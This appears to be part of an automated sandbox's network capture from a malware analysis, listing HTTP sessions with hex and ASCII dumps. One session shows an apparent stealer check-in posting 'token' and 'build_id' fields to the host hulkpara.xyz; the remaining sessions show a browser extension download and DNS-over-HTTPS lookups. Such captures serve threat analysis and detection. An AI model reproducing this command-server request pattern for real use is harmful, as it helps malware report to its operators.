2024-12-18 20:09:11 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----6FU3EKF37QIE37Y5FUS0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:11 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74 Data Ascii: ------6FU3EKF37QIE37Y5FUS0Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------6FU3EKF37QIE37Y5FUS0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------6FU3EKF37QIE37Y5FUS0Cont
2024-12-18 20:09:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49761	142.250.181.65	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:29 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-18 20:09:30 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 18 Dec 2024 15:58:14 GMT Expires: Thu, 18 Dec 2025 15:58:14 GMT Cache-Control: public, max-age=31536000 Age: 15076 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-18 20:09:30 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2024-12-18 20:09:30 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49773	172.64.41.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca836d790f68-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49778	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca836f944340-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d5 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPc)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49777	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca836ed40cc8-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 22 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom"A)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49780	172.64.41.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca839b20f02d-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ec 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49781	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
